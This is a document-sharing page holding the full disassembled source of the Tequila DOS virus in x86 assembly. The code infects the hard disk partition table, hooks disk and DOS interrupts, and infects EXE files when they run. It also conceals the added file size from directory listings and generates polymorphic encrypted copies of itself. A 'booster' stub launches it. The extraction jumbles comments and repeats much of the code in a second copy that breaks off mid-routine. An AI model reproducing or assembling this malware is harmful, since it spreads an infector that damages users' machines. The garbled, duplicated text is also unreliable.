Tequila
This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA
Overview
Download & View Tequila as PDF for free.
More details
- Words: 2,780
- Pages: 19
;============================= ; the tequila virus = ; a recompilable = ; dis-assembly = ; specifically designed = ; for assembly to a com file = ; with the a86 assembler. = ; ++++++++++++++++++ = ; if you desire a "perfect" = ; byte for byte source code = ;match-up, the masm assembler= ; must be used and the noted = ;instructions must be changed= ; to comply with masm syntax.= ; in addition, all byte and = ;word pointer references must= ; be changed from b and w to = ; byte pointer and word = ; pointer. = ;============================= code_seg segment assume cs:code_seg, ds:code_seg, es:code_seg, ss:code_seg org 0100 tequila proc near jmp start db 000, 000, 000, 000, 000, 000, 000, 0ffh, 0ffh db 009, 005, 001h, 010h, 000, 000, 002h, 0fah, 000, 00ch db db db db db db db
00dh, 00ah, 00dh, 00ah "welcome to t.tequila's latest production.", 00dh, 00ah "contact t.tequila/p.o.box 543/6312 st'hausen/" "switzerland.", 00dh, 00ah "loving thoughts to l.i.n.d.a", 00dh, 00ah, 00dh, 00ah "beer and tequila forever !", 00dh, 00ah, 00dh, 00ah "$"
db "execute: mov ax, fe03 / int 21. key to go on!" program_termination_routine: push bp mov bp,sp sub sp,0ch push ax push bx push cx push dx push si push di push es push ds push cs pop ds mov ax,w[6]
inc ax je 0243h dec ax jne 020dh dec w[8] jne 0243h jmp 0246h mov ah,02ah call int_21 mov si,cx mov cx,w[8] cmp cl,dl jne 022fh mov ax,si sub ax,w[6] mul b[011h] add al,dh add ch,3 cmp al,ch jae 0237h mov w[6],0ffffh jmp 0243h mov w[6],0 mov w[8],3 jmp 02df mov bx,0b800h int 011 and ax,030h cmp ax,030h jne 0256h mov bx,0b000h mov es,bx xor bx,bx mov di,0fd8fh mov si,0fc18h mov w[bp-2],si mov w[bp-4],di mov cx,01e mov ax,w[bp-2] imul ax mov w[bp-8],ax mov w[bp-6],dx mov ax,w[bp-4] imul ax mov w[bp-0c],ax mov w[bp-0a],dx add ax,w[bp-8] adc dx,w[bp-6] cmp dx,0f jae 02b0 mov ax,w[bp-2] imul w[bp-4] idiv w[0f] add ax,di mov w[bp-4],ax mov ax,w[bp-8] mov dx,w[bp-6] sub ax,w[bp-0c]
;masm mod. needed ;masm ;masm ;masm ;masm
mod. mod. mod. mod.
needed needed needed needed
;masm mod. needed ;masm mod. needed
;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed
;masm mod. needed
;masm mod. needed ;masm mod. needed
sbb dx,w[bp-0a] idiv w[0d] add ax,si mov w[bp-2],ax loop 0269 inc cx shr cl,1 mov ch,cl mov cl,0db es mov w[bx],cx inc bx inc bx add si,012 cmp si,01b8 jl 0260 ;masm add di,034 cmp di,02a3 jl 025d ;masm xor di,di mov si,0bb mov cx,02d cld movsb inc di loop 02d7 xor ax,ax int 016 pop ds pop es pop di pop si pop dx pop cx pop bx pop ax mov sp,bp pop bp ret print_message: push dx push ds push cs pop ds mov ah,9 mov dx,012 call int_21 pop ds pop dx ret new_partition_table: cli xor bx,bx mov ds,bx mov ss,bx mov sp,07c00 sti
;masm mod. needed ;masm mod. needed
;masm mod. needed
mod. needed mod. needed
;masm mod. needed
xor di,di sub w[0413],3 int 012 mov cl,6 shl ax,cl mov es,ax push es mov ax,022a push ax mov ax,0205 mov cx,w[07c30] inc cx mov dx,w[07c32] int 013 retf
;masm mod. needed
db 002, 0fe db 04c, 0e9 db 080, 004 push cs pop ds xor ax,ax mov es,ax mov bx,07c00 push es push bx mov ax,0201 mov cx,w[0226] mov dx,w[0228] int 013 push cs pop es cld mov si,0409 mov di,09be mov cx,046 rep movsb mov si,091b mov di,0a04 mov cx,045 rep movsb cli xor ax,ax mov es,ax es les bx,[070] mov w[09b0],bx mov w[09b2],es mov es,ax es les bx,[084] mov w[09b4],bx mov w[09b6],es mov es,ax es mov w[070],044f es mov w[072],ds sti retf
;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed
install: call next_line next_line: pop si sub si,028f push si push ax push es push cs pop ds mov ax,es add w[si+2],ax add w[si+4],ax dec ax mov es,ax mov ax,0fe02 int 021 cmp ax,01fd je no_partition_infection es cmp b[0],05a ;masm mod. needed jne no_partition_infection es cmp w[3],0bb ;masm mod. needed jbe no_partition_infection es mov ax,w[012] ;masm mod. needed sub ax,0bb mov es,ax xor di,di mov cx,09a4 cld rep movsb push es pop ds call infect_partition_table no_partition_infection: pop es pop ax push es pop ds pop si cs mov ss,w[si+4] ;masm mod. needed chain_to_the_host_file: cs jmp d[si] ;masm mod. needed infect_partition_table: mov ah,02a int 021 mov w[6],cx ;masm mod. needed mov w[8],dx ;masm mod. needed mov ah,052 int 021 es mov ax,w[bx-2] ;masm mod. needed mov w[03e8],ax ;masm mod. needed mov ax,03513 int 021 mov w[09a0],bx ;masm mod. needed mov w[09a2],es ;masm mod. needed mov ax,03501 int 021
mov si,bx mov di,es mov ax,02501 mov dx,03da int 021 mov b[0a],0 pushf pop ax or ax,0100 push ax popf mov ax,0201 mov bx,09a4 mov cx,1 mov dx,080 push ds pop es pushf call d[09a0] pushf pop ax and ax,0feff push ax popf pushf mov ax,02501 mov dx,si mov ds,di int 021 popf jae 0450 jmp ret ;masm push es pop ds cmp w[bx+02e],0fe02 jne 045c jmp ret ;masm add bx,01be mov cx,4 mov al,b[bx+4] cmp al,4 je 0479 ;masm cmp al,6 je 0479 ;masm cmp al,1 je 0479 ;masm add bx,010 loop 0463 jmp short ret mov dl,080 mov dh,b[bx+5] mov w[0228],dx mov ax,w[bx+6] mov cx,ax mov si,6 and ax,03f cmp ax,si jbe ret ;masm
;masm mod. needed
;masm mod. needed
;masm mod. needed mod. needed
;masm mod. needed mod. needed
mod. needed mod. needed mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed
mod. needed
sub cx,si mov di,bx inc cx mov w[0226],cx mov ax,0301 mov bx,09a4 pushf call d[09a0] jb ret ;masm dec cx mov w[di+6],cx inc cx sub w[di+0c],si sbb w[di+0e],0 mov ax,0305 mov bx,0 inc cx pushf call d[09a0] jb ret ;masm mov si,01f6 mov di,09a4 mov cx,034 cld rep movsb mov ax,0301 mov bx,09a4 mov cx,1 xor dh,dh pushf call d[09a0] ret
;masm mod. needed
;masm mod. needed mod. needed
;masm mod. needed mod. needed
;masm mod. needed
new_interrupt_one: push bp mov bp,sp cs cmp b[0a],1 ;masm mod. needed je 0506 ;masm mod. needed cmp w[bp+4],09b4 ja 050b ;masm mod. needed push ax push es les ax,[bp+2] cs mov w[09a0],ax ;masm mod. needed cs mov w[09a2],es ;masm mod. needed cs mov b[0a],1 pop es pop ax and w[bp+6],0feff pop bp iret new_interrupt_13: cmp cx,1 jne 054e cmp dx,080 jne 054e cmp ah,3
;masm mod. needed ;masm mod. needed
ja 054e ;masm mod. needed cmp ah,2 jb 054e ;masm mod. needed push cx push dx dec al je 0537 ;masm mod. needed push ax push bx add bx,0200 inc cx pushf cs call d[09a0] ;masm mod. needed pop bx pop ax mov al,1 cs mov cx,w[0226] ;masm mod. needed cs mov dx,w[0228] ;masm mod. needed pushf cs call d[09a0] ;masm mod. needed pop dx pop cx retf 2 cs jmp d[09a0] ;masm mod. needed new_timer_tick_interrupt: push ax push bx push es push ds xor ax,ax mov es,ax push cs pop ds es les bx,[084] ;masm mod. needed mov ax,es cmp ax,0800 ja 05b0 ;masm mod. needed cmp ax,w[09b6] jne 0575 ;masm mod. needed cmp bx,w[09b4] je 05b0 ;masm mod. needed mov w[09b4],bx ;masm mod. needed mov w[09b6],es ;masm mod. needed xor ax,ax mov ds,ax cs les bx,[09b0] ;masm mod. needed mov w[070],bx ;masm mod. needed mov w[072],es ;masm mod. needed les bx,[04c] ;masm mod. needed cs mov w[09a0],bx ;masm mod. needed cs mov w[09a2],es ;masm mod. needed mov w[04c],09be ;masm mod. needed mov w[04e],cs ;masm mod. needed mov w[084],04b1 ;masm mod. needed mov w[086],cs ;masm mod. needed pop ds pop es
pop bx pop ax iret int_21_intercept: cmp ah,011 jb check_for_handle cmp ah,012 ja check_for_handle call adjust_fcb_matches retf 2 check_for_handle: cmp ah,04e jb check_for_previous_installation cmp ah,04f ja check_for_previous_installation call adjust_handle_matches retf 2 check_for_previous_installation: cmp ax,0fe02 jne check_for_message_print not ax iret check_for_message_print: cmp ax,0fe03 jne check_for_execute cs cmp w[6],0 ;masm mod. needed jne chain_to_true_int_21 call print_message iret check_for_execute: cmp ax,04b00 je set_stack cmp ah,04c jne chain_to_true_int_21 set_stack: cs mov w[09a6],sp ;masm mod. needed cs mov w[09a8],ss ;masm mod. needed cli push cs pop ss mov sp,0ae5 sti cmp ah,04c jne to_an_infection call program_termination_routine jmp short no_infection to_an_infection: call infect_the_file no_infection: cli cs mov ss,w[09a8] ;masm mod. needed cs mov sp,w[09a6] ;masm mod. needed sti jmp short chain_to_true_int_21 chain_to_true_int_21: cs inc w[09bc] ;masm mod. needed cs jmp d[09b4] ;masm mod. needed
new_critical_error_handler: mov al,3 iret adjust_fcb_matches: push bx push es push ax mov ah,02f call int_21 pop ax pushf cs call d[09b4] ;masm mod. needed pushf push ax cmp al,0ff je 0664 ;masm mod. needed es cmp b[bx],0ff ;masm mod. needed jne 064f ;masm mod. needed add bx,7 es mov al,b[bx+017] ;masm mod. needed and al,01f cmp al,01f jne 0664 ;masm mod. needed es sub w[bx+01d],09a4 ;masm mod. needed es sbb w[bx+01f],0 ;masm mod. needed pop ax popf pop es pop bx ret adjust_handle_matches: push bx push es push ax mov ah,02f call int_21 pop ax pushf cs call d[09b4] ;masm mod. needed pushf push ax jb 0691 ;masm mod. needed es mov al,b[bx+016] ;masm mod. needed and al,01f cmp al,01f jne 0691 ;masm mod. needed es sub w[bx+01a],09a4 ;masm mod. needed es sbb w[bx+01c],0 ;masm mod. needed pop ax popf pop es pop bx ret write_to_the_file:
mov ah,040 jmp 069c
;masm mod. needed
read_from_the_file: mov ah,03f call 06b4 ;masm mod. needed jb ret ;masm mod. needed sub ax,cx ret move_to_end_of_file: xor cx,cx xor dx,dx mov ax,04202 jmp 06b4
;masm mod. needed
move_to_beginning_of_file: xor cx,cx xor dx,dx mov ax,04200 cs mov bx,w[09a4] int_21: cli pushf cs call d[09b4] ret
;masm mod. needed
;masm mod. needed
infect_the_file: push ax push bx push cx push dx push si push di push es push ds call check_letters_in_filename jae good_name jmp bad_name good_name: push dx push ds push cs pop ds save_and_replace_critical_error_handler: mov ax,03524 call int_21 mov w[09b8],bx ;masm mod. needed mov w[09ba],es ;masm mod. needed mov ax,02524 mov dx,052a call int_21 pop ds pop dx
save_and_replace_file_attribute: mov ax,04300 call int_21 cs mov w[09aa],cx ;masm mod. needed jae 06fe ;masm mod. needed jmp restore_crit_handler mov ax,04301 xor cx,cx call int_21 jb 077c ;masm mod. needed open_file_for_read_write: mov ax,03d02 call int_21 jb 0771 ;masm mod. needed push dx push ds push cs pop ds mov w[09a4],ax ;masm mod. needed get_filedate: mov ax,05700 call 06b4 ;masm mod. needed jb 075c ;masm mod. needed mov w[09ac],dx ;masm mod. needed mov w[09ae],cx ;masm mod. needed read_and_check_exe_header: call 06ad ;masm mod. needed mov dx,0a49 mov cx,01c call 069a ;masm mod. needed jb 075c ;masm mod. needed push ds pop es mov di,0e8 mov cx,020 cmp w[0a49],05a4d ;masm mod. needed jne 075c ;masm mod. needed mov ax,w[0a5b] cld repne scasw jne 0754 ;masm mod. needed or w[09ae],01f ;masm mod. needed jmp 075c ;masm mod. needed call read_past_end_of_file jb 075c ;masm mod. needed call encrypt_and_write_to_file restore_altered_date: mov ax,05701 mov dx,w[09ac] mov cx,w[09ae] call 06b4 close_the_file: mov ah,03e
;masm mod. needed
call 06b4 restore_file_attribute: pop ds pop dx mov ax,04301 cs mov cx,w[09aa] call int_21 restore_crit_handler: mov ax,02524 cs lds dx,[09b8] call int_21
;masm mod. needed
;masm mod. needed
;masm mod. needed
bad_name: pop ds pop es pop di pop si pop dx pop cx pop bx pop ax ret check_letters_in_filename: push ds pop es mov di,dx mov cx,-1 xor al,al cld repne scasb not cx mov di,dx mov ax,04353 mov si,cx scasw je 07b7 ;masm mod. needed dec di loop 07a5 ;masm mod. needed mov cx,si mov di,dx mov al,056 repne scasb je 07b7 ;masm mod. needed clc ret stc ret read_past_end_of_file: mov cx,-1 mov dx,-0a call 06a8 ;masm mod. needed mov dx,0a65 mov cx,8 call 069a ;masm mod. needed
jb ret ;masm cmp w[0a65],0fdf0 jne 07f0 cmp w[0a67],0aac5 jne 07f0 mov cx,-1 mov dx,-9 call 06a8 mov dx,0a6b mov cx,4 call 0696 ret clc ret
mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed
encrypt_and_write_to_file: call move_to_end_of_file mov si,ax mov di,dx mov bx,0a49 mov ax,w[bx+4] mul w[0d] ;masm mod. needed sub ax,si sbb dx,di jae 080c ;masm mod. needed jmp out_of_encrypt mov ax,w[bx+8] mul w[0b] ;masm mod. needed sub si,ax sbb di,dx mov ax,w[bx+0e] mov w[4],ax ;masm mod. needed add w[4],010 ;masm mod. needed mul w[0b] ;masm mod. needed add ax,w[bx+010] sub ax,si sbb dx,di jb 083c ;masm mod. needed sub ax,080 sbb dx,0 jb ret ;masm mod. needed add w[bx+0e],09b mov ax,w[bx+016] add ax,010 mov w[2],ax ;masm mod. needed mov ax,w[bx+014] mov w[0],ax ;masm mod. needed call 06a4 ;masm mod. needed add ax,09a4 adc dx,0 div w[0d] ;masm mod. needed inc ax mov w[0a4d],ax ;masm mod. needed mov w[0a4b],dx ;masm mod. needed mov dx,di mov ax,si div w[0b] ;masm mod. needed mov w[0a5f],ax ;masm mod. needed
mov bx,dx add dx,0960 mov w[0a5d],dx ;masm mod. needed call copy_to_high_memory_encrypt_write jb ret ;masm mod. needed or w[09ae],01f ;masm mod. needed mov bx,w[09bc] and bx,01f shl bx,1 mov ax,w[bx+0e8] mov w[0a5b],ax ;masm mod. needed call move_to_beginning_of_file mov cx,01c mov dx,0a49 write_the_new_header: call 0696 out_of_encrypt: ret
;masm mod. needed
copy_to_high_memory_encrypt_write: push bp xor ah,ah int 01a mov ax,dx mov bp,dx push ds pop es mov di,0960 mov si,di mov cx,020 cld rep stosw xor dx,dx mov es,dx call encrypt_step_one call encrypt_step_two call encrypt_step_three mov b[si],0e9 mov di,028c sub di,si sub di,3 inc si mov w[si],di mov ax,0a04 call ax pop bp ret encrypt_step_one: dec bp es test b[bp],2 jne 08eb mov b[si],0e inc si call garbler mov b[si],01f inc si
;masm mod. needed ;masm mod. needed
call garbler ret mov w[si],0cb8c inc si inc si call garbler mov w[si],0db8e inc si inc si call garbler ret encrypt_step_two: and ch,0fe dec bp es test b[bp],2 ;masm mod. needed je 0920 ;masm mod. needed or ch,1 mov b[si],0be inc si mov w[si],bx inc si inc si call garbler add bx,0960 test ch,1 je 0934 ;masm mod. needed mov b[si],0bb inc si mov w[si],bx inc si inc si call garbler add bx,0960 test ch,1 je 090c ;masm mod. needed sub bx,0960 call garbler mov b[si],0b9 inc si mov ax,0960 mov w[si],ax inc si inc si call garbler call garbler ret encrypt_step_three: mov ah,014 mov dh,017 test ch,1 je 0958 ;masm mod. needed xchg dh,ah mov di,si mov al,08a mov w[si],ax inc si
inc si call garbler xor dl,dl mov b[0a39],028 ;masm mod. needed dec bp es test b[bp],2 ;masm mod. needed je 0978 ;masm mod. needed mov dl,030 mov b[0a39],dl ;masm mod. needed mov w[si],dx inc si inc si mov w[si],04346 inc si inc si call garbler mov ax,0fe81 mov cl,0be test ch,1 je 0993 ;masm mod. needed mov ah,0fb mov cl,0bb mov w[si],ax inc si inc si push bx add bx,040 mov w[si],bx inc si inc si pop bx mov b[si],072 inc si mov dx,si inc si call garbler mov b[si],cl inc si mov w[si],bx inc si inc si mov ax,si sub ax,dx dec ax mov bx,dx mov b[bx],al call garbler call garbler mov b[si],0e2 inc si sub di,si dec di mov ax,di mov b[si],al inc si call garbler ret
garbler: dec bp es test b[bp],0f je ret ;masm dec bp es mov al,b[bp] test al,2 je 0a0e ;masm test al,4 je 09f7 ;masm test al,8 je 09f1 ;masm mov w[si],0c789 inc si inc si jmp ret ;masm mov b[si],090 inc si jmp ret ;masm mov al,085 dec bp es mov ah,b[bp] test ah,2 je 0a05 ;masm dec al or ah,0c0 mov w[si],ax inc si inc si jmp ret ;masm dec bp es test b[bp],2 je 0a1a ;masm mov al,039 jmp 09f9 mov b[si],0fc inc si ret
;masm mod. needed mod. needed ;masm mod. needed mod. needed mod. needed mod. needed
mod. needed mod. needed ;masm mod. needed mod. needed
mod. needed ;masm mod. needed mod. needed ;masm mod. needed
make_the_disk_write: call perform_encryption_decryption mov ah,040 mov bx,w[09a4] mov dx,0 mov cx,09a4 pushf call d[09b4] ;masm mod. needed jb 0a37 ;masm mod. needed sub ax,cx pushf cmp b[0a39],028 ;masm mod. needed jne 0a44 ;masm mod. needed mov b[0a39],0 ;masm mod. needed call perform_encryption_decryption popf ret perform_encryption_decryption:
mov bx,0 mov si,0960 mov cx,0960 mov dl,b[si] xor b[bx],dl inc si inc bx cmp si,09a0 jb 0a61 mov si,0960 loop 0a52 ret
;masm mod. needed ;masm mod. needed
the_file_decrypting_routine: push cs pop ds mov bx,4 mov si,0964 mov cx,0960 mov dl,b[si] add b[bx],dl inc si inc bx cmp si,09a4 jb 0a7e ;masm mod. needed mov si,0964 loop 0a6f ;masm mod. needed jmp 0390 ;masm mod. needed ;========== the following is not part of the virus ======== ;========== but is merely the booster. ======== start: lea mov mov sub jmp
w[0104],exit w[0106],cs bx,cs w[0106],bx install
exit: int 020 tequila endp code_seg ends end tequila
;masm mod. needed ;masm mod. needed ;masm mod. needed
00dh, 00ah, 00dh, 00ah "welcome to t.tequila's latest production.", 00dh, 00ah "contact t.tequila/p.o.box 543/6312 st'hausen/" "switzerland.", 00dh, 00ah "loving thoughts to l.i.n.d.a", 00dh, 00ah, 00dh, 00ah "beer and tequila forever !", 00dh, 00ah, 00dh, 00ah "$"
db "execute: mov ax, fe03 / int 21. key to go on!" program_termination_routine: push bp mov bp,sp sub sp,0ch push ax push bx push cx push dx push si push di push es push ds push cs pop ds mov ax,w[6]
inc ax je 0243h dec ax jne 020dh dec w[8] jne 0243h jmp 0246h mov ah,02ah call int_21 mov si,cx mov cx,w[8] cmp cl,dl jne 022fh mov ax,si sub ax,w[6] mul b[011h] add al,dh add ch,3 cmp al,ch jae 0237h mov w[6],0ffffh jmp 0243h mov w[6],0 mov w[8],3 jmp 02df mov bx,0b800h int 011 and ax,030h cmp ax,030h jne 0256h mov bx,0b000h mov es,bx xor bx,bx mov di,0fd8fh mov si,0fc18h mov w[bp-2],si mov w[bp-4],di mov cx,01e mov ax,w[bp-2] imul ax mov w[bp-8],ax mov w[bp-6],dx mov ax,w[bp-4] imul ax mov w[bp-0c],ax mov w[bp-0a],dx add ax,w[bp-8] adc dx,w[bp-6] cmp dx,0f jae 02b0 mov ax,w[bp-2] imul w[bp-4] idiv w[0f] add ax,di mov w[bp-4],ax mov ax,w[bp-8] mov dx,w[bp-6] sub ax,w[bp-0c]
;masm mod. needed ;masm ;masm ;masm ;masm
mod. mod. mod. mod.
needed needed needed needed
;masm mod. needed ;masm mod. needed
;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed
;masm mod. needed
;masm mod. needed ;masm mod. needed
sbb dx,w[bp-0a] idiv w[0d] add ax,si mov w[bp-2],ax loop 0269 inc cx shr cl,1 mov ch,cl mov cl,0db es mov w[bx],cx inc bx inc bx add si,012 cmp si,01b8 jl 0260 ;masm add di,034 cmp di,02a3 jl 025d ;masm xor di,di mov si,0bb mov cx,02d cld movsb inc di loop 02d7 xor ax,ax int 016 pop ds pop es pop di pop si pop dx pop cx pop bx pop ax mov sp,bp pop bp ret print_message: push dx push ds push cs pop ds mov ah,9 mov dx,012 call int_21 pop ds pop dx ret new_partition_table: cli xor bx,bx mov ds,bx mov ss,bx mov sp,07c00 sti
;masm mod. needed ;masm mod. needed
;masm mod. needed
mod. needed mod. needed
;masm mod. needed
xor di,di sub w[0413],3 int 012 mov cl,6 shl ax,cl mov es,ax push es mov ax,022a push ax mov ax,0205 mov cx,w[07c30] inc cx mov dx,w[07c32] int 013 retf
;masm mod. needed
db 002, 0fe db 04c, 0e9 db 080, 004 push cs pop ds xor ax,ax mov es,ax mov bx,07c00 push es push bx mov ax,0201 mov cx,w[0226] mov dx,w[0228] int 013 push cs pop es cld mov si,0409 mov di,09be mov cx,046 rep movsb mov si,091b mov di,0a04 mov cx,045 rep movsb cli xor ax,ax mov es,ax es les bx,[070] mov w[09b0],bx mov w[09b2],es mov es,ax es les bx,[084] mov w[09b4],bx mov w[09b6],es mov es,ax es mov w[070],044f es mov w[072],ds sti retf
;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed
install: call next_line next_line: pop si sub si,028f push si push ax push es push cs pop ds mov ax,es add w[si+2],ax add w[si+4],ax dec ax mov es,ax mov ax,0fe02 int 021 cmp ax,01fd je no_partition_infection es cmp b[0],05a ;masm mod. needed jne no_partition_infection es cmp w[3],0bb ;masm mod. needed jbe no_partition_infection es mov ax,w[012] ;masm mod. needed sub ax,0bb mov es,ax xor di,di mov cx,09a4 cld rep movsb push es pop ds call infect_partition_table no_partition_infection: pop es pop ax push es pop ds pop si cs mov ss,w[si+4] ;masm mod. needed chain_to_the_host_file: cs jmp d[si] ;masm mod. needed infect_partition_table: mov ah,02a int 021 mov w[6],cx ;masm mod. needed mov w[8],dx ;masm mod. needed mov ah,052 int 021 es mov ax,w[bx-2] ;masm mod. needed mov w[03e8],ax ;masm mod. needed mov ax,03513 int 021 mov w[09a0],bx ;masm mod. needed mov w[09a2],es ;masm mod. needed mov ax,03501 int 021
mov si,bx mov di,es mov ax,02501 mov dx,03da int 021 mov b[0a],0 pushf pop ax or ax,0100 push ax popf mov ax,0201 mov bx,09a4 mov cx,1 mov dx,080 push ds pop es pushf call d[09a0] pushf pop ax and ax,0feff push ax popf pushf mov ax,02501 mov dx,si mov ds,di int 021 popf jae 0450 jmp ret ;masm push es pop ds cmp w[bx+02e],0fe02 jne 045c jmp ret ;masm add bx,01be mov cx,4 mov al,b[bx+4] cmp al,4 je 0479 ;masm cmp al,6 je 0479 ;masm cmp al,1 je 0479 ;masm add bx,010 loop 0463 jmp short ret mov dl,080 mov dh,b[bx+5] mov w[0228],dx mov ax,w[bx+6] mov cx,ax mov si,6 and ax,03f cmp ax,si jbe ret ;masm
;masm mod. needed
;masm mod. needed
;masm mod. needed mod. needed
;masm mod. needed mod. needed
mod. needed mod. needed mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed
mod. needed
sub cx,si mov di,bx inc cx mov w[0226],cx mov ax,0301 mov bx,09a4 pushf call d[09a0] jb ret ;masm dec cx mov w[di+6],cx inc cx sub w[di+0c],si sbb w[di+0e],0 mov ax,0305 mov bx,0 inc cx pushf call d[09a0] jb ret ;masm mov si,01f6 mov di,09a4 mov cx,034 cld rep movsb mov ax,0301 mov bx,09a4 mov cx,1 xor dh,dh pushf call d[09a0] ret
;masm mod. needed
;masm mod. needed mod. needed
;masm mod. needed mod. needed
;masm mod. needed
new_interrupt_one: push bp mov bp,sp cs cmp b[0a],1 ;masm mod. needed je 0506 ;masm mod. needed cmp w[bp+4],09b4 ja 050b ;masm mod. needed push ax push es les ax,[bp+2] cs mov w[09a0],ax ;masm mod. needed cs mov w[09a2],es ;masm mod. needed cs mov b[0a],1 pop es pop ax and w[bp+6],0feff pop bp iret new_interrupt_13: cmp cx,1 jne 054e cmp dx,080 jne 054e cmp ah,3
;masm mod. needed ;masm mod. needed
ja 054e ;masm mod. needed cmp ah,2 jb 054e ;masm mod. needed push cx push dx dec al je 0537 ;masm mod. needed push ax push bx add bx,0200 inc cx pushf cs call d[09a0] ;masm mod. needed pop bx pop ax mov al,1 cs mov cx,w[0226] ;masm mod. needed cs mov dx,w[0228] ;masm mod. needed pushf cs call d[09a0] ;masm mod. needed pop dx pop cx retf 2 cs jmp d[09a0] ;masm mod. needed new_timer_tick_interrupt: push ax push bx push es push ds xor ax,ax mov es,ax push cs pop ds es les bx,[084] ;masm mod. needed mov ax,es cmp ax,0800 ja 05b0 ;masm mod. needed cmp ax,w[09b6] jne 0575 ;masm mod. needed cmp bx,w[09b4] je 05b0 ;masm mod. needed mov w[09b4],bx ;masm mod. needed mov w[09b6],es ;masm mod. needed xor ax,ax mov ds,ax cs les bx,[09b0] ;masm mod. needed mov w[070],bx ;masm mod. needed mov w[072],es ;masm mod. needed les bx,[04c] ;masm mod. needed cs mov w[09a0],bx ;masm mod. needed cs mov w[09a2],es ;masm mod. needed mov w[04c],09be ;masm mod. needed mov w[04e],cs ;masm mod. needed mov w[084],04b1 ;masm mod. needed mov w[086],cs ;masm mod. needed pop ds pop es
pop bx pop ax iret int_21_intercept: cmp ah,011 jb check_for_handle cmp ah,012 ja check_for_handle call adjust_fcb_matches retf 2 check_for_handle: cmp ah,04e jb check_for_previous_installation cmp ah,04f ja check_for_previous_installation call adjust_handle_matches retf 2 check_for_previous_installation: cmp ax,0fe02 jne check_for_message_print not ax iret check_for_message_print: cmp ax,0fe03 jne check_for_execute cs cmp w[6],0 ;masm mod. needed jne chain_to_true_int_21 call print_message iret check_for_execute: cmp ax,04b00 je set_stack cmp ah,04c jne chain_to_true_int_21 set_stack: cs mov w[09a6],sp ;masm mod. needed cs mov w[09a8],ss ;masm mod. needed cli push cs pop ss mov sp,0ae5 sti cmp ah,04c jne to_an_infection call program_termination_routine jmp short no_infection to_an_infection: call infect_the_file no_infection: cli cs mov ss,w[09a8] ;masm mod. needed cs mov sp,w[09a6] ;masm mod. needed sti jmp short chain_to_true_int_21 chain_to_true_int_21: cs inc w[09bc] ;masm mod. needed cs jmp d[09b4] ;masm mod. needed
new_critical_error_handler: mov al,3 iret adjust_fcb_matches: push bx push es push ax mov ah,02f call int_21 pop ax pushf cs call d[09b4] ;masm mod. needed pushf push ax cmp al,0ff je 0664 ;masm mod. needed es cmp b[bx],0ff ;masm mod. needed jne 064f ;masm mod. needed add bx,7 es mov al,b[bx+017] ;masm mod. needed and al,01f cmp al,01f jne 0664 ;masm mod. needed es sub w[bx+01d],09a4 ;masm mod. needed es sbb w[bx+01f],0 ;masm mod. needed pop ax popf pop es pop bx ret adjust_handle_matches: push bx push es push ax mov ah,02f call int_21 pop ax pushf cs call d[09b4] ;masm mod. needed pushf push ax jb 0691 ;masm mod. needed es mov al,b[bx+016] ;masm mod. needed and al,01f cmp al,01f jne 0691 ;masm mod. needed es sub w[bx+01a],09a4 ;masm mod. needed es sbb w[bx+01c],0 ;masm mod. needed pop ax popf pop es pop bx ret write_to_the_file:
mov ah,040 jmp 069c
;masm mod. needed
read_from_the_file: mov ah,03f call 06b4 ;masm mod. needed jb ret ;masm mod. needed sub ax,cx ret move_to_end_of_file: xor cx,cx xor dx,dx mov ax,04202 jmp 06b4
;masm mod. needed
move_to_beginning_of_file: xor cx,cx xor dx,dx mov ax,04200 cs mov bx,w[09a4] int_21: cli pushf cs call d[09b4] ret
;masm mod. needed
;masm mod. needed
infect_the_file: push ax push bx push cx push dx push si push di push es push ds call check_letters_in_filename jae good_name jmp bad_name good_name: push dx push ds push cs pop ds save_and_replace_critical_error_handler: mov ax,03524 call int_21 mov w[09b8],bx ;masm mod. needed mov w[09ba],es ;masm mod. needed mov ax,02524 mov dx,052a call int_21 pop ds pop dx
save_and_replace_file_attribute: mov ax,04300 call int_21 cs mov w[09aa],cx ;masm mod. needed jae 06fe ;masm mod. needed jmp restore_crit_handler mov ax,04301 xor cx,cx call int_21 jb 077c ;masm mod. needed open_file_for_read_write: mov ax,03d02 call int_21 jb 0771 ;masm mod. needed push dx push ds push cs pop ds mov w[09a4],ax ;masm mod. needed get_filedate: mov ax,05700 call 06b4 ;masm mod. needed jb 075c ;masm mod. needed mov w[09ac],dx ;masm mod. needed mov w[09ae],cx ;masm mod. needed read_and_check_exe_header: call 06ad ;masm mod. needed mov dx,0a49 mov cx,01c call 069a ;masm mod. needed jb 075c ;masm mod. needed push ds pop es mov di,0e8 mov cx,020 cmp w[0a49],05a4d ;masm mod. needed jne 075c ;masm mod. needed mov ax,w[0a5b] cld repne scasw jne 0754 ;masm mod. needed or w[09ae],01f ;masm mod. needed jmp 075c ;masm mod. needed call read_past_end_of_file jb 075c ;masm mod. needed call encrypt_and_write_to_file restore_altered_date: mov ax,05701 mov dx,w[09ac] mov cx,w[09ae] call 06b4 close_the_file: mov ah,03e
;masm mod. needed
call 06b4 restore_file_attribute: pop ds pop dx mov ax,04301 cs mov cx,w[09aa] call int_21 restore_crit_handler: mov ax,02524 cs lds dx,[09b8] call int_21
;masm mod. needed
;masm mod. needed
;masm mod. needed
bad_name: pop ds pop es pop di pop si pop dx pop cx pop bx pop ax ret check_letters_in_filename: push ds pop es mov di,dx mov cx,-1 xor al,al cld repne scasb not cx mov di,dx mov ax,04353 mov si,cx scasw je 07b7 ;masm mod. needed dec di loop 07a5 ;masm mod. needed mov cx,si mov di,dx mov al,056 repne scasb je 07b7 ;masm mod. needed clc ret stc ret read_past_end_of_file: mov cx,-1 mov dx,-0a call 06a8 ;masm mod. needed mov dx,0a65 mov cx,8 call 069a ;masm mod. needed
